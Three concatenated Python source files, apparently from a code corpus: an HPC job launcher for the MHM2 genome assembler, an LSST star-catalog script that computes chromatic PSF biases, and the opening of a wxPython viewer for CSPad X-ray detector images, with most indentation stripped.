def get_job_cores_per_node(defaultCores = 0):
"""Query the job environment for the number of cores per node to use, if available"""
if defaultCores == 0:
defaultCores = get_hdw_cores_per_node()
if 'GASNET_PSHM_NODES' in os.environ:
print("Detected procs_per_node from GASNET_PSHM_NODES=",os.getenv('GASNET_PSHM_NODES'))
return int(os.getenv('GASNET_PSHM_NODES'))
ntasks_per_node = None
if is_slurm_job():
ntasks_per_node = get_slurm_cores_per_node(defaultCores)
if is_lsb_job():
ntasks_per_node = get_lsb_cores_per_node()
if is_cobalt_job():
ntasks_per_node = get_cobalt_cores_per_node()
if ntasks_per_node is not None:
return ntasks_per_node
return defaultCores
def get_slurm_job_nodes():
"""Query the SLURM job environment for the number of nodes"""
nodes = os.environ.get('SLURM_JOB_NUM_NODES')
if nodes is None:
nodes = os.environ.get('SLURM_NNODES')
if nodes:
return int(nodes)
print("Warning: could not determine the number of nodes in this SLURM job (%d). Only using 1" % (get_job_id()))
return 1
def get_lsb_job_nodes():
"""Query the LFS job environment for the number of nodes"""
# LSB_MCPU_HOSTS=batch2 1 h22n07 42 h22n08 42
nodes = os.environ.get('LSB_MCPU_HOSTS')
if nodes:
return int( (len(nodes.split()) - 2) / 2)
print("Warning: could not determine the number of nodes in this LSF job (%s). Only using 1" % (get_job_id()))
return 1
def get_pbs_job_nodes():
"""Query the PBS job environment for the number of nodes"""
nodesfile = os.environ.get('PBS_NODEFILE')
if nodesfile is not None:
nodes = 0
with open(nodesfile, 'r') as f:
for line in f:
nodes += 1
return nodes
print("Warning: could not determine the number of nodes in this PBS job (%d). Only using 1" % (get_job_id()))
return 1
def get_ge_job_nodes():
"""Query the Grid Engine job environment for the number of nodes"""
nodes = os.environ.get("NHOSTS")
if nodes is not None:
return int(nodes)
print("Warning: could not determine the number of nodes in this SGE job (%d). Only using 1" % (get_job_id()))
return 1
def get_cobalt_job_nodes():
"""Query the COBALT job environment for the number of nodes"""
nodes = os.environ.get("COBALT_JOBSIZE")
if nodes is not None:
return int(nodes)
print("Warning: could not determine the number of nodes in this COBALT job (%s). Only using 1" % (get_job_id()))
return 1
def get_job_nodes():
"""Query the job environment for the number of nodes"""
if is_slurm_job():
return get_slurm_job_nodes()
if is_lsb_job():
return get_lsb_job_nodes()
if is_pbs_job():
return get_pbs_job_nodes()
if is_ge_job():
return get_ge_job_nodes()
if is_cobalt_job():
return get_cobalt_job_nodes()
print("Warning: could not determine the number of nodes in this unsupported scheduler job (%s). Only using 1" % (get_job_id()))
return 1
def get_job_desc():
job_name = get_job_name()
if job_name == "":
return "PID " + get_job_id()
return "job " + get_job_id() + " (" + job_name + ")"
def which(file_name):
if os.path.exists(file_name) and os.access(file_name, os.X_OK):
return file_name
for path in os.environ["PATH"].split(os.pathsep):
full_path = os.path.join(path, file_name)
if os.path.exists(full_path) and os.access(full_path, os.X_OK):
return full_path
return None
def handle_interrupt(signum, frame):
global _orig_sighdlr
global _stop_thread
print_red('\n\nInterrupt received, signal', signum)
_stop_thread = True
signal.signal(signal.SIGINT, _orig_sighdlr)
exit_all(1)
def exit_all(status):
global _proc
if _proc:
#os.kill(_proc.pid, signal.SIGINT)
try:
_proc.terminate()
except OSError:
pass
#print("Process ", _proc, " is already terminated\n")
sys.exit(status)
def die(*args):
print_red('\nFATAL ERROR: ', *args)
sys.stdout.flush()
sys.stderr.flush()
exit_all(1)
def check_exec(cmd, args, expected):
test_exec = which(cmd)
if not test_exec:
die('Cannot find ', cmd)
try:
result = subprocess.check_output([test_exec, args]).decode()
if expected not in result:
die(test_exec, ' failed to execute')
except subprocess.CalledProcessError as err:
die('Could not execute ', test_exec +': ', err)
def capture_err(err_msgs):
global _proc
global _stop_thread
for line in iter(_proc.stderr.readline, b''):
try:
line = line.decode()
except:
print("WARNING could not decode binary output: ", line)
pass
# filter out all but warnings
# errors causing crashes will come to light later
if 'WARNING' in line:
if 'GASNet was configured without multi-rail support' not in line and 'GASNET_AM_CREDITS_SLACK reduced to GASNET_AM_CREDITS_PP' not in line:
sys.stderr.write(line)
sys.stderr.flush()
# FIXME: check for messages about memory failures
if 'UPC++ could not allocate' in line:
print_red('ERROR: UPC++ memory allocation failure')
err_msgs.append(line)
if _stop_thread:
return
_proc.wait()
def check_err_msgs(err_msgs):
warnings = []
errors = []
for msg in err_msgs:
msg = msg.strip()
if 'WARNING' in msg:
warnings.append(msg)
elif msg[:2] == '+ ':
# this is 'set -x' console echo of a command
pass
elif 'GASNet reporting enabled' in msg:
# this is just info
pass
elif msg != '':
errors.append(msg)
if len(warnings) > 0:
print('There were', len(warnings), 'warnings:', file=sys.stderr)
for warning in list(collections.OrderedDict.fromkeys(warnings)):
sys.stderr.write(warning + '\n')
if len(errors) > 0:
print('There were', len(errors), 'errors:', file=sys.stderr)
print_sigint = False
for err in errors:
if 'SIGINT(2)' in err and print_sigint:
continue
print_sigint = True
sys.stderr.write(err + '\n')
return len(errors) + len(warnings)
def print_err_msgs(err_msgs, return_status):
global _output_dir
num_problems = check_err_msgs(err_msgs)
err_msgs.append('==============================================')
if len(_output_dir) == 0:
_output_dir = os.getcwd() + "/"
# we have not yet entered the output directory, so this is a failure of the command line
# and we need to dump all the error messages to the console
print_red("No output dir was created yet")
for msg in err_msgs:
print(msg)
sys.exit(return_status)
else:
if _output_dir[0] != '/':
_output_dir = os.getcwd() + "/" + _output_dir
suspect_oom = None
if return_status != 0:
if return_status == 9: # SIGKILL
suspect_oom = "Got SIGKILLed"
err_msgs.append("Return status: %d\n" % (return_status))
print_red("MHM2 failed")
# keep track of all msg copies so we don't print duplicates
seen_msgs = {}
per_rank_dir = _output_dir + 'per_rank/'
if not os.path.exists(per_rank_dir):
per_rank_dir = _output_dir
err_log = per_rank_dir + 'err.log'
with open(err_log, 'a') as f:
for msg in err_msgs:
clean_msg = msg.strip()
#clean_msg = re.sub('\(proc .+\)', '(proc XX)', msg.strip())
if clean_msg not in seen_msgs:
f.write(clean_msg + '\n')
f.flush()
seen_msgs[clean_msg] = True
if 'SIGBUS' in clean_msg or 'bound CqGetEvent GNI_RC_TRANSACTION_ERROR' in clean_msg or 'oom-kill' in clean_msg or 'bad_alloc' in clean_msg or 'SIGKILL' in clean_msg \
or 'Cannot allocate memory' in clean_msg or 'mmap failed' in clean_msg:
suspect_oom = clean_msg
if suspect_oom is not None:
f.write("Out of memory is suspected because of: %s\n" %(suspect_oom))
print_red("Out of memory is suspected based on the errors in err.log such as: ", suspect_oom, "\n")
if per_rank_dir != _output_dir:
new_err_log = _output_dir + "err.log"
if os.path.exists(new_err_log):
os.unlink(new_err_log)
os.link(err_log, new_err_log)
err_log = new_err_log
if num_problems > 0:
print_red("Check " + err_log + " for details")
def main():
global _orig_sighdlr
global _proc
global _output_dir
global _err_thread
start_time = time.time()
_orig_sighdlr = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, handle_interrupt)
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument("--auto-resume", action="store_true", help="Automatically resume after a failure")
argparser.add_argument("--shared-heap", default="10%", help="Shared heap as a percentage of memory")
#argparser.add_argument("--procs-per-node", default=0, help="Processes to spawn per node (default auto-detect cores)")
argparser.add_argument("--procs", default=0, type=int, help="Total numer of processes")
argparser.add_argument("--trace-dir", default=None, help="Output directory for stacktrace")
argparser.add_argument("--stats-dir", default=None, help="Output directory for stacktrace")
argparser.add_argument("--preproc", default=None, help="Comma separated preprocesses and options like (valgrind,--leak-check=full) or options to upcxx-run before binary")
options, unknown_options = argparser.parse_known_args()
if options.auto_resume:
print("--auto-resume is enabled: will try to restart if run fails")
check_exec('upcxx-run', '-h', 'UPC++')
# expect mhm2 to be in same directory as mhm2.py
mhm2_binary_path = os.path.split(sys.argv[0])[0] + '/mhm2'
if not (os.path.exists(mhm2_binary_path) or which(mhm2_binary_path)):
die("Cannot find binary mhm2 in '", mhm2_binary_path, "'")
#cores_per_node = int(options.procs_per_node)
#if cores_per_node == 0:
# cores_per_node = get_job_cores_per_node()
num_nodes = get_job_nodes()
if options.procs == 0:
options.procs = num_nodes * get_job_cores_per_node()
cmd = ['upcxx-run', '-n', str(options.procs), '-N', str(num_nodes)]
# special spawner for summit -- executes jsrun and picks up job size from the environment!
if 'LMOD_SYSTEM_NAME' in os.environ and os.environ['LMOD_SYSTEM_NAME'] == "summit":
print("This is Summit - executing custom script mhm2-upcxx-run-summit to spawn the job")
# expect mhm2-upcxx-run-summit to be in same directory as mhm2.py too
cmd = [mhm2_binary_path + "-upcxx-run-summit"]
if 'UPCXX_RUN_SUMMIT_OPTS' in os.environ:
cmd.extend(os.environ['UPCXX_RUN_SUMMIT_OPTS'].split())
if 'UPCXX_SHARED_HEAP_SIZE' not in os.environ:
cmd.extend(['-shared-heap', options.shared_heap]) # both upcxx-run and upcxx-run-summit support this
if options.preproc:
print("Executing preprocess options: ", options.preproc)
pplist = options.preproc.split(',')
cmd.extend(pplist)
cmd.extend(['--', mhm2_binary_path])
cmd.extend(unknown_options)
print("Executing mhm2 with " + get_job_desc() + " on " + str(num_nodes) + " nodes.")
print("Executing as: " + " ".join(sys.argv))
cores = get_job_cores_per_node()
noderanks = '0'
    halfnoderanks = '0,%d' % (cores // 2)
for n in range(1, num_nodes):
noderanks += ',' + str(n*cores)
        halfnoderanks += ',' + str(n * cores) + ',' + str(n * cores + cores // 2)
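    # noderanks lists the first rank of every node and halfnoderanks adds each node's middle
    # rank; they feed GASNET_STATSNODES / GASNET_TRACENODES below so only one or two ranks
    # per node emit statistics or traces.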
# set extra GASNET environments from build and/or options to mhm2.py
runtime_vars = """@MHM2PY_RUNTIME_ENV@"""
if runtime_vars == '@MHM2PY_RUNTIME' + '_ENV@':
runtime_vars = ''
runtime_output_vars = ''
if options.stats_dir is not None:
if not os.path.isdir(options.stats_dir):
os.mkdir(options.stats_dir)
runtime_vars += ' GASNET_STATSFILE="%s/stats.%%", ' % (os.path.realpath(options.stats_dir))
runtime_vars += runtime_output_vars
if os.environ.get("GASNET_STATSNODES") is None:
runtime_vars += ' GASNET_STATSNODES="%s", ' % noderanks
if options.trace_dir is not None:
if not os.path.isdir(options.trace_dir):
os.mkdir(options.trace_dir)
runtime_vars += ' GASNET_TRACEFILE="%s/trace.%%", ' % (os.path.realpath(options.trace_dir))
if os.environ.get("GASNET_TRACENODES") is None:
runtime_vars += ' GASNET_TRACENODES="%s", ' % halfnoderanks
if os.environ.get("GASNET_TRACEMASK") is None:
runtime_vars += ' GASNET_TRACEMASK="GPWBNIH", ' # some of the more useful and less verbose trace options
# it appears that this GASNET_COLL_SCRATCH_SIZE is still needed
print("Setting GASNET_COLL_SCRATCH_SIZE=4M", runtime_vars)
runenv = eval('dict(os.environ, GASNET_COLL_SCRATCH_SIZE="4M", %s MHM2_RUNTIME_PLACEHOLDER="")' % (runtime_vars))
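    # runenv is assembled with eval() so the build-time @MHM2PY_RUNTIME_ENV@ substitution and
    # the optional GASNET_* settings above can be spliced in as keyword arguments; every
    # fragment appended to runtime_vars must therefore end with a trailing comma.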
#print("Runtime environment: ", runenv)
mhm2_lib_path = os.path.split(sys.argv[0])[0] + '/../lib'
if not os.path.exists(mhm2_lib_path):
die("Cannot find mhm2 lib install in '", mhm2_lib_path, "'")
# This should no longer be necessary with the static GPU build fixes of df8cc23, leaving here in case problems reoccur
#if which('nvcc'):
# # FIXME: this ugly hack is because we need to load a shared library on Cori GPU nodes,
# # which can't be done with the craype environment. Not needed anywhere else :(
# # The intel library path is only needed for the intel compiler. Sigh.
# runenv['LD_LIBRARY_PATH'] = mhm2_lib_path + ':/usr/lib64/slurmpmi/:/opt/intel/compilers_and_libraries_2019.3.199/linux/compiler/lib/intel64_lin/'
# print('Setting LD_LIBRARY_PATH=' + runenv['LD_LIBRARY_PATH'])
restarting = False
err_msgs = []
while True:
print(str(datetime.datetime.now()) + ' ' + 'executing:\n', ' '.join(cmd))
started_exec = False
completed_round = False
try:
_proc = subprocess.Popen(cmd, env=runenv, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# thread captures the error stream
_err_thread = threading.Thread(target=capture_err, args=(err_msgs,))
_err_thread.start()
for line in iter(_proc.stdout.readline, b''):
if not started_exec:
print('Started executing at ' + str(datetime.datetime.now()) + ' with PID ' + str(_proc.pid))
started_exec = True
try:
line = line.decode()
except:
print("WARNING could not decode binary output: ", line)
pass
sys.stdout.write(line)
sys.stdout.flush()
if len(_output_dir) == 0 and (' output = ' in line or 'Using output dir: ' in line):
_output_dir = line.split()[3]
onlyascii = ''.join([s for s in _output_dir if ord(s) < 127 and ord(s) >= 32])
_output_dir = onlyascii
if _output_dir.endswith('[0m'):
_output_dir = _output_dir[:-3]
if _output_dir[-1] != '/':
_output_dir += '/'
# get rid of any leftover error logs if not restarting
try:
# always rename the error log if it already exists
new_err_log = _output_dir + 'err.log-' + str(datetime.datetime.now().isoformat())
os.rename(_output_dir + 'err.log', new_err_log)
print("Renamed old err.log to ", new_err_log)
os.unlink(_output_dir + '/per_rank/err.log')
except:
pass
if 'Completed ' in line and 'initialization' not in line:
completed_round = True
_err_thread.join()
if _proc.returncode < 0:
_proc.returncode *= -1
if _proc.returncode not in [0, 15] or not status:
signame = ''
if _proc.returncode <= len(SIGNAMES) and _proc.returncode > 0:
signame = ' (' + SIGNAMES[_proc.returncode - 1] + ')'
if _proc.returncode == 127:
# 127 is the return code from the CLI parser, so we don't want to print this
found_error = False
for msg in err_msgs:
if msg.startswith('Error'):
print(msg, end='')
found_error = True
elif msg.startswith('INI was not able to parse'):
print(" Unable to parse entry '" + msg.split()[-1] + "' in the config file")
else:
print(" ", msg, end='')
if found_error:
return 127
else:
return 0
print_red("\nERROR: subprocess terminated with return code ", _proc.returncode)
signals_found = {}
for err_msg in err_msgs:
for signame in SIGNAMES:
if signame in err_msg:
if not signame in signals_found:
signals_found[signame] = 0
signals_found[signame] += 1
for signame in SIGNAMES:
if signame in signals_found:
print_red(" Found ", signals_found[signame], " occurences of ", signame)
got_signal = signame
#err_msgs.append("ERROR: subprocess terminated with return code " + str(_proc.returncode) + " " + signame)
print_err_msgs(err_msgs, _proc.returncode)
if completed_round and options.auto_resume:
print_red('Trying to restart with output directory ', _output_dir)
restarting = True
err_msgs = []
cmd.append('--restart')
if _output_dir[:-1] not in cmd:
cmd.extend(['-o', _output_dir])
time.sleep(5)
else:
if options.auto_resume:
print_red("No additional completed round. Could not restart, exiting...")
return signal.SIGABRT
else:
final_assembly = _output_dir + "final_assembly.fasta"
if os.path.exists(final_assembly):
print("Final assembly can be found at ", final_assembly)
else:
err_msgs.append("Could not find the final assembly! It should be at %s\n" % (final_assembly))
print_err_msgs(err_msgs, _proc.returncode)
print('Overall time taken (including any restarts): %.2f s' % (time.time() - start_time))
break
except:
print_red("Got an exception")
traceback.print_tb(sys.exc_info()[2], limit=100)
print_err_msgs(err_msgs, -1)
if _proc:
try:
print_red("\nTerminating subprocess after exception: ", sys.exc_info(), "\n")
traceback.print_tb(sys.exc_info()[2], limit=100)
_proc.terminate()
except OSError:
pass
except:
print_red("\nUnexpected error in forced termination of subprocess: ", sys.exc_info())
traceback.print_tb(sys.exc_info()[2], limit=100)
raise
raise
return 0
if __name__ == "__main__":
status = 1
try:
status = main()
except SystemExit:
if status != 127:
raise
except:
e = sys.exc_info()[0]
print_red("\n", "\nCaught an exception %s in mhm2.py!\n\n" % e)
traceback.print_exc(file=sys.stderr)
finally:
exit_all(status)
|
process_star_catalog.py
|
"""Process star catalog produced by make_catalogs.py to add columns for DCR biases, chromatic
seeing biases, and chromatic diffraction limit biases. This script requires that the LSST CatSim
SED files are downloaded and that either the environment variable $CAT_SHARE_DATA (for older versions
of the LSST DM stack) or SIMS_SED_LIBRARY_DIR (for the current version of the stack) points to them.
Note that you might need to source the `loadLSST.sh` file and run `setup sims_sed_library` to get
these paths to work for the current version of the lsst stack.
Chromatic biases include:
Rbar - zenith-direction centroid shift due to differential chromatic refraction.
V - zenith-direction second moment shift due to differential chromatic refraction
S - change in "size" of the PSF due to a power-law dependence of the FWHM with wavelength:
FWHM \propto \lambda^{\alpha}. S = the second moment square radius r^2 = Ixx + Iyy.
Three cases are tabulated:
\alpha = -0.2 : appropriate for atmospheric chromatic seeing. denoted 'S_m02'
\alpha = 1.0 : appropriate for a pure diffraction limited PSF. denoted 'S_p10'
\alpha = 0.6 : appropriate for Euclid (see Voigt+12 or Cypriano+10). denoted 'S_p06'
"""
import sys
import os
import cPickle
from argparse import ArgumentParser
import numpy as np
from scipy.interpolate import interp1d
import galsim
import _mypath
import chroma
import chroma.lsstetc
from multiprocessing import Process, Queue
# Exposure Time Calculator for magnitude error estimates
psf = galsim.Kolmogorov(fwhm = 0.67)
etc = {f:chroma.lsstetc.ETC(f) for f in 'ugrizy'}
datadir = '../../../data/'
if 'CAT_SHARE_DATA' in os.environ:
SED_dir = os.environ['CAT_SHARE_DATA'] + 'data'
elif 'SIMS_SED_LIBRARY_DIR' in os.environ:
SED_dir = os.environ['SIMS_SED_LIBRARY_DIR']
else:
raise ValueError("Cannot find CatSim SED files.")
# Assemble dictionary of all filters used below
filters = {}
for f in 'ugrizy':
ffile = datadir+'filters/LSST_{}.dat'.format(f)
filters['LSST_{}'.format(f)] = (galsim.Bandpass(ffile)
.thin(1.e-5) # thin for speed
.withZeropoint('AB',
effective_diameter=6.4,
exptime=30.0))
for width in [150,250,350,450]:
ffile = datadir+'filters/Euclid_{}.dat'.format(width)
filters['Euclid_{}'.format(width)] = (galsim.Bandpass(ffile)
.thin(1.e-5)
.withZeropoint('AB',
effective_diameter=6.4, # huh?
exptime=30.0))
for f in 'ugriz':
ffile = datadir+'filters/SDSS_{}.dat'.format(f)
filters['SDSS_{}'.format(f)] = (galsim.Bandpass(ffile)
.withZeropoint('AB',
effective_diameter=6.4, # huh?
exptime=30.0))
# Cheat a little bit here. The SDSS_u filter is defined down to 298 nm, but some of the
# stellar spectra only start at 300 nm. So we shift the blue limit of the filter a bit.
filters['SDSS_u'] = (filters['SDSS_u'].truncate(blue_limit=300.0)
.withZeropoint('AB', effective_diameter=6.4, exptime=30.0))
# LSST SED catalog entries are normalized by their AB magnitude at 500 nm. So define a narrow
# filter at 500nm to use for normalization.
filters['norm'] = (galsim.Bandpass(galsim.LookupTable([499, 500, 501], [0, 1, 0]))
.withZeropoint('AB', effective_diameter=6.4, exptime=30.0))
# Define some useful np dtypes
Lbands = [('LSST_u', np.float),
('LSST_g', np.float),
('LSST_r', np.float),
('LSST_i', np.float),
('LSST_z', np.float),
('LSST_y', np.float)]
Ebands = [('Euclid_150', np.float),
('Euclid_250', np.float),
('Euclid_350', np.float),
('Euclid_450', np.float)]
LSbands = [('LSST_u', np.float),
('LSST_g', np.float),
('LSST_r', np.float),
('LSST_i', np.float),
('LSST_z', np.float),
('LSST_y', np.float),
('SDSS_u', np.float),
('SDSS_g', np.float),
('SDSS_r', np.float),
('SDSS_i', np.float),
('SDSS_z', np.float)]
LEbands = [('LSST_u', np.float),
('LSST_g', np.float),
('LSST_r', np.float),
('LSST_i', np.float),
('LSST_z', np.float),
('LSST_y', np.float),
('Euclid_150', np.float),
('Euclid_250', np.float),
('Euclid_350', np.float),
('Euclid_450', np.float)]
LSEbands = [('LSST_u', np.float),
('LSST_g', np.float),
('LSST_r', np.float),
('LSST_i', np.float),
('LSST_z', np.float),
('LSST_y', np.float),
('SDSS_u', np.float),
('SDSS_g', np.float),
('SDSS_r', np.float),
('SDSS_i', np.float),
('SDSS_z', np.float),
('Euclid_150', np.float),
('Euclid_250', np.float),
('Euclid_350', np.float),
('Euclid_450', np.float)]
dbtype = [('objectID', np.int64),
('raJ2000', np.float),
('decJ2000', np.float),
('magNorm', np.float),
('sedFilePath', np.str_, 64),
('galacticAv', np.float),
('mag', Lbands), # only LSST since read straight from CatSim
('magCalc', LSEbands),
('magErr', LSEbands),
('Rbar', LSbands), # doesn't make sense for space mission
('V', LSbands),
('S_m02', LSbands),
('S_p06', Ebands),
('S_p10', Ebands)]
def worker(inqueue, outqueue):
for j, s, debug in iter(inqueue.get, 'STOP'):
result = process_one_star(s, debug)
outqueue.put((j, result))
def process_one_star(s, debug):
d = np.recarray((1,), dtype=dbtype)
d.fill(np.nan)
# position
d.objectID = int(s[0])
d.raJ2000 = float(s[1])
d.decJ2000 = float(s[2])
# flux
d.magNorm = float(s[3])
d.sedFilePath = s[10]
d.galacticAv = float(s[11])
spec = stellar_spectrum(d, filters['norm'])
# loop through filters and fill in database columns
for k, f in enumerate('ugrizy'):
# also append magnitude from catalog as a sanity check
d['mag']['LSST_'+f] = float(s[4+k])
bp = filters['LSST_'+f] # for brevity
try:
d['magCalc']['LSST_'+f] = spec.calculateMagnitude(bp)
dcr = spec.calculateDCRMomentShifts(bp, zenith_angle=np.pi/4)
d['Rbar']['LSST_'+f] = dcr[0][1,0]
d['V']['LSST_'+f] = dcr[1][1,1]
d['S_m02']['LSST_'+f] = spec.calculateSeeingMomentRatio(bp)
d['magErr']['LSST_'+f] = etc[f].err(psf, d['magCalc']['LSST_'+f][0])
except:
pass
# separate loop for Euclid filters
for fw in [150, 250, 350, 450]:
fname = 'Euclid_{}'.format(fw)
bp = filters[fname]
try:
d['magCalc'][fname] = spec.calculateMagnitude(bp)
d['S_p06'][fname] = spec.calculateSeeingMomentRatio(bp, alpha=0.6)
d['S_p10'][fname] = spec.calculateSeeingMomentRatio(bp, alpha=1.0)
except:
pass
# separate loop for SDSS filters
for f in 'ugriz':
fname = 'SDSS_{}'.format(f)
bp = filters[fname]
try:
d['magCalc'][fname] = spec.calculateMagnitude(bp)
dcr = spec.calculateDCRMomentShifts(bp, zenith_angle=np.pi/4)
d['Rbar'][fname] = dcr[0][1,0]
d['V'][fname] = dcr[1][1,1]
d['S_m02'][fname] = spec.calculateSeeingMomentRatio(bp)
except:
pass
if debug:
print
print 'syn mag:' + ' '.join(['{:6.3f}'.format(
d['magCalc']['LSST_'+fname][0])
for fname in 'ugrizy'])
print 'syn err:' + ' '.join(['{:6.3f}'.format(
d['magErr']['LSST_'+fname][0])
for fname in 'ugrizy'])
print 'cat mag:' + ' '.join(['{:6.3f}'.format(d['mag']['LSST_'+fname][0])
for fname in 'ugrizy'])
print 'SDSS: ' + ' '.join(['{:6.3f}'.format(d['magCalc']['SDSS_'+fname][0])
for fname in 'ugriz'])
print 'Euclid: ' + ' '.join(['{:6.3f}'.format(
d['magCalc']['Euclid_{}'.format(fw)][0])
for fw in [150, 250, 350, 450]])
return d
def file_len(fname):
"""Count '\n's in file.
"""
with open(fname) as f:
for i, l in enumerate(f):
pass
return i + 1
def stellar_spectrum(star, norm_bandpass):
sed = chroma.SED(os.path.join(SED_dir, star['sedFilePath'][0]))
sed = sed.withMagnitude(star['magNorm'][0], norm_bandpass)
# Limit the range to that which can be reddened.
sed.blue_limit = max([91, sed.blue_limit])
sed.red_limit = min([6000, sed.red_limit])
sed = sed.redden(A_v=star['galacticAv'][0])
return sed
def process_star_file(filename, nmax=None, debug=False, seed=None, start=0):
nrows = file_len(filename)
if nmax is None:
nmax = nrows-1
if nmax > (nrows-1):
nmax = nrows-1
# Define the output compound dtype
data = np.recarray((nmax,), dtype = dbtype)
data[:] = np.nan
# Do randomization of the rows if requested
order = range(1, nrows+1)
if seed is not None:
import random
random.seed(seed)
random.shuffle(order)
order = order[start:start+nmax]
order.sort()
# Setup the multiprocessing
nthreads = 8
task_queue = Queue()
results_queue = Queue()
for i in range(nthreads):
Process(target=worker, args=(task_queue, results_queue)).start()
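    # Each worker consumes (row index, raw line, debug) tuples from task_queue and pushes
    # processed rows onto results_queue; the 'STOP' sentinels queued after the read loop
    # shut the workers down once every row has been handed out.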
with open(filename) as f:
if not debug:
outdev = sys.stdout
else:
outdev = open(os.devnull, 'w')
j = 0
for i, line in enumerate(f):
if i == 0 : continue # ignore column labels row
if j >= nmax : break
if order[j] != i : continue
s = line.split(', ')
#data[j] = process_one_star(s, debug)
task_queue.put((j, s, debug))
j += 1
with chroma.ProgressBar(nmax, file=outdev) as bar:
for i in range(nmax):
bar.update()
j, result = results_queue.get()
data[j] = result
for i in range(nthreads):
task_queue.put('STOP')
return data
def runme():
junk = process_star_file('output/star_catalog.dat', nmax=25, debug=True)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('--nmax', type=int, default=30000,
help="maximum number of stars to process (default: 30000)")
parser.add_argument('--seed', type=int, default=None,
help="randomize order of stars in catalog")
parser.add_argument('--outfile', default = 'output/star_data.pkl',
help="output filename (Default: output/star_data.pkl)")
parser.add_argument('--infile', default = 'output/star_catalog.dat',
help="input filename (Default: output/star_catalog.dat)")
parser.add_argument('--debug', action='store_true')
args = parser.parse_args()
cPickle.dump(process_star_file(args.infile, nmax=args.nmax,
debug=args.debug, seed=args.seed),
open(args.outfile, 'wb'))
|
mod_view.py
|
# -*- mode: python; coding: utf-8; indent-tabs-mode: nil; python-indent: 2 -*-
#
# $Id$
"""Interactive image viewer for CSPad images
XXX Known issues, wishlist:
* Is it slow? Yes!
* Radial distribution plot, requested by Jan F. Kern
* Coordinate and resolution tool-tips in sub-pixel zoom. Can we
choose the colour automagically?
"""
from __future__ import division
__version__ = "$Revision$"
import multiprocessing
import thread
import threading
import time
from dxtbx.format.FormatPYunspecified import FormatPYunspecified
from iotbx.detectors.npy import NpyImage
from rstbx.viewer.frame import XrayFrame
from xfel.cxi.cspad_ana import common_mode, cspad_tbx
from xfel.cxi.cspad_ana import skip_event_flag
class _ImgDict(NpyImage):
"""Minimal iotbx detector class for in-memory dictionary
representation of NpyImage images. This class must be defined at
the top level of the module so that it can be pickled.
"""
def __init__(self, data, parameters):
# self.vendortype is required to guess the beam centre convention.
super(_ImgDict, self).__init__('')
self.parameters = parameters
self.vendortype = 'npy_raw'
self.bin_safe_set_data(data)
def readHeader(self):
pass
def read(self):
pass
class _Format(FormatPYunspecified):
"""Minimal Format class for in-memory dxtbx representation of
FormatPYunspecified images. This class must be defined at the top
level of the module so that it can be pickled.
"""
def __init__(self, **kwargs):
"""The _Format constructor builds a dxtbx Format instance from the
supplied keyworded arguments. It should be equivalent to the
FormatPYunspecified constructor.
"""
from copy import deepcopy
from dxtbx.model.beam import Beam, BeamFactory
from dxtbx.model.detector import Detector, DetectorFactory
from dxtbx.model.goniometer import Goniometer, GoniometerFactory
from dxtbx.model import Scan, ScanFactory
from spotfinder.applications.xfel import cxi_phil
from iotbx.detectors.cspad_detector_formats import detector_format_version
# From Format.__init__().
self._goniometer_factory = GoniometerFactory
self._detector_factory = DetectorFactory
self._beam_factory = BeamFactory
self._scan_factory = ScanFactory
# From FormatPYunspecified._start(). Split the keyworded
# arguments into a parameter dictionary suitable for
# iotbx.detectors.npy.NpyImage and a separate image data object.
parameters = dict(
BEAM_CENTER_X=kwargs['PIXEL_SIZE'] * kwargs['BEAM_CENTER'][0],
BEAM_CENTER_Y=kwargs['PIXEL_SIZE'] * kwargs['BEAM_CENTER'][1],
CCD_IMAGE_SATURATION=kwargs['SATURATED_VALUE'],
DISTANCE=kwargs['DISTANCE'],
OSC_RANGE=0,
OSC_START=0,
PIXEL_SIZE=kwargs['PIXEL_SIZE'],
SATURATED_VALUE=kwargs['SATURATED_VALUE'],
SIZE1=kwargs['DATA'].focus()[0],
SIZE2=kwargs['DATA'].focus()[1],
WAVELENGTH=kwargs['WAVELENGTH'])
self.detectorbase = _ImgDict(kwargs['DATA'], parameters)
# Attempt to apply tile translations only for detectors that
# support it.
version_lookup = detector_format_version(
kwargs['DETECTOR_ADDRESS'],
kwargs['TIME_TUPLE'][0])
if version_lookup is not None:
params = cxi_phil.cxi_versioned_extract(
"distl.detector_format_version=" + version_lookup)
# Necessary to keep the phil parameters for subsequent calls to
# get_tile_manager().
horizons_phil = params.persist.commands
self.detectorbase.translate_tiles(horizons_phil)
self.detectorbase.horizons_phil_cache = deepcopy(horizons_phil)
# From Format.setup().
goniometer_instance = self._goniometer()
assert(isinstance(goniometer_instance, Goniometer))
self._goniometer_instance = goniometer_instance
detector_instance = self._detector()
assert(isinstance(detector_instance, Detector))
self._detector_instance = detector_instance
beam_instance = self._beam()
assert(isinstance(beam_instance, Beam))
self._beam_instance = beam_instance
scan_instance = self._scan()
assert(isinstance(scan_instance, Scan))
self._scan_instance = scan_instance
class _XrayFrameThread(threading.Thread):
"""The _XrayFrameThread class allows MainLoop() to be run as a
thread, which is necessary because all calls to wxPython must be
made from the same thread that originally imported wxPython.
This is all based on "Running MainLoop in a separate thread",
http://wiki.wxpython.org/MainLoopAsThread.
"""
def __init__(self):
"""The thread is started automatically on initialisation.
self.run() will initialise self.frame and release self._init_lock.
"""
super(_XrayFrameThread, self).__init__()
self.setDaemon(1)
self._init_lock = threading.Lock()
self._next_semaphore = threading.Semaphore()
self._start_orig = self.start
self._frame = None
self.start = self._start_local
self._init_lock.acquire()
self.start()
def _start_local(self):
"""The _start_local() function calls the run() function through
self._start_orig, and exists only after self._init_lock has been
released. This eliminates a race condition which could cause
updates to be sent to a non-existent frame.
"""
self._start_orig()
self._init_lock.acquire()
def run(self):
"""The run() function defines the frame and starts the main loop.
self._init_lock is released only when all initialisation is done.
Whatever thread is the current one when wxWindows is initialised
is what it will consider the "main thread." For wxPython 2.4 that
happens when wxPython.wx is imported the first time. For 2.5 it
will be when the wx.App object is created.
"""
import wx
from wxtbx import bitmaps
app = wx.App(0)
self._bitmap_pause = bitmaps.fetch_icon_bitmap('actions', 'stop')
self._bitmap_run = bitmaps.fetch_icon_bitmap('actions', 'runit')
self._frame = XrayFrame(None, -1, "X-ray image display", size=(800, 720))
self._frame.Bind(wx.EVT_IDLE, self.OnIdle)
self.setup_toolbar(self._frame.toolbar)
self._frame.Show()
self._init_lock.release()
app.MainLoop()
# Avoid deadlock where the send_data() function is waiting for the
# semaphore after the frame has closed.
